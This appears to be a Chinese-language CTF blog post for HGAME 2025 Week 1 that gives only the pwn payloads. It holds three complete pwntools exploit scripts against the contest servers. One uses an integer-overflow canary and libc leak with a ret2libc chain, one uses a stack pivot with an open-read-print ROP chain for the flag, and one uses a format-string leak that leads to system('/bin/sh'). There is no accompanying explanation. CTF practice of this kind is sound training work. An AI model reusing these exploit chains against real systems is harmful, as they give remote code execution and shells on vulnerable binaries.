HGAME Week1

发表于2025-02-15更新于2025-02-15

这里只附上pwn的payload

counting petals

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from pwn import *

io = remote("node1.hgame.vidar.club", 30732)
#io = process("./vuln")
elf = ELF("./vuln")
libc = ELF("./libc.so.6")
context(os='linux', arch='amd64')
#context.log_level='debug'

def debug():
    gdb.attach(io)

def to_signed_64bit(n):
    n = n & 0xFFFFFFFFFFFFFFFF  # 保留低64位
    if n >= 0x8000000000000000:  # 检查符号位
        n -= 0x10000000000000000
    return n

def to_unsigned_64bit(n):
    return n & 0xFFFFFFFFFFFFFFFF


io.sendlineafter(b'\nHow many flowers have you prepared this time?', b'16')
for i in range(15):
    io.sendlineafter(b'the flower number', b'0')
payload = str(to_signed_64bit(u64(p32(64) * 2))).encode()
io.sendlineafter(b'the flower number', payload)
#debug()
io.sendlineafter(b'Reply 1 indicates the former and 2 indicates the latter: ', b'0')
io.recvuntil(b'274877907008 + ')
canary = to_unsigned_64bit(int(io.recvuntil(b'+', drop=True)))
print(f'canary:{hex(canary)}')
io.recvuntil(b'1 + ')
libc_base = to_unsigned_64bit(int(io.recvuntil(b'+', drop=True))) - libc.sym["__libc_start_main"] + 0x30
print(f'libc:{hex(libc_base)}')
rdi = libc_base + 0x2a3e5
ret = libc_base + 0x2a3e6
io.sendlineafter(b'\nHow many flowers have you prepared this time?', b'16')
for i in range(15):
    io.sendlineafter(b'the flower number', b'0')
payload = str(to_signed_64bit(u64(p32(22) + p32(18)))).encode()
io.sendlineafter(b'the flower number', payload)
io.sendlineafter(b'the flower number', str(to_signed_64bit(ret)).encode())
io.sendlineafter(b'the flower number', str(to_signed_64bit(rdi)).encode())
io.sendlineafter(b'the flower number', str(to_signed_64bit(libc_base + next(libc.search(b"/bin/sh")))).encode())
io.sendlineafter(b'the flower number', str(to_signed_64bit(libc_base + libc.sym["system"])).encode())
io.sendlineafter(b'Reply 1 indicates the former and 2 indicates the latter: ', b'0')
io.interactive()

ezstack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
from pwn import *

io = remote("node2.hgame.vidar.club", 31283)
#io = process("./vuln")
elf = ELF("./vuln")
libc = ELF("./libc6_2.31-0ubuntu9.16_amd64.so")
context(os='linux', arch='amd64')
#context.log_level='debug'

def debug():
    gdb.attach(io)
libc_base = 0x7f5b93859000
rdi = 0x401713
ret = rdi + 1
rsi_r15 = 0x401711
read = 0x4013D9
rsi = 0x2601f + libc_base
rdx_rbx = 0x15fae6 + libc_base
bss = 0x404130 + 0x800
rax = 0x36174 + libc_base
payload = b'a' * 0x50 + p64(bss + 0x70) + p64(read)
io.sendafter(b'Good luck.', payload)
payload = (p64(bss + 0x20) + p64(rdx_rbx) + p64(0x300) + p64(0) + p64(0x401420)).ljust(0x50, b'\x00') + p64(bss + 0x20) + p64(read)
io.sendafter(b'Good luck.', payload)
io.sendafter(b'Good luck.', b'1')
#print(hex(u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['read']))
payload = b'flag\x00\x00\x00\x00' + b'a' * 0x50 + p64(rsi) + p64(bss - 0x30) +  p64(ret) + p64(rdi) + p64(bss - 0x30) + p64(rsi) + p64(0) + p64(libc_base + libc.sym["open"]) + p64(rdi) + p64(5) + p64(rsi) + p64(bss - 0x30) + p64(rdx_rbx) + p64(0x300) + p64(0) + p64(libc_base + libc.sym['read']) + p64(rdi) + p64(4) + p64(elf.sym['print'])
io.send(payload)
io.interactive()

format

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *

io = remote("node1.hgame.vidar.club", 30123)
#io = process("./vuln")
elf = ELF("./vuln")
libc = ELF("./libc.so.6")
context(os='linux', arch='amd64')
#context.log_level='debug'

def debug():
    gdb.attach(io)

io.sendlineafter(b'you have n chance to getshell\n n = ', b'1')
io.sendlineafter(b'type something:', b'%p@')
io.recvuntil(b'you type: ')
stack = int(io.recvuntil(b'@', drop=True), 16) + 0x211c + 0x14
print(f'stack:{hex(stack)}')
io.sendlineafter(b'you have n space to getshell(n<5)\n n = ', b'-1000000')
payload = b'a' * 5 + p64(stack) + p64(0x4012CF) + b'@@%29$p@' + p32(0) + p32(0) +p64(0) + p64(0x4010D4)
#debug()
io.send(payload)
io.recvuntil(b'@@')
libc_base = int(io.recvuntil(b'@', drop=True), 16) - libc.sym["__libc_start_main"] - 128
print(f'libc:{hex(libc_base)}')
rdi = 0x2a3e5 + libc_base
ret = 0x2a3e6 + libc_base
io.sendlineafter(b'you have n chance to getshell\n n = ', b'0')
io.sendlineafter(b'you have n space to getshell(n<5)\n n = ', b'-1000000')
payload = b'a' * 13 + p64(ret) + p64(rdi) + p64(next(libc.search(b'/bin/sh')) + libc_base) + p64(libc_base + libc.sym["system"])
io.send(payload)
io.interactive()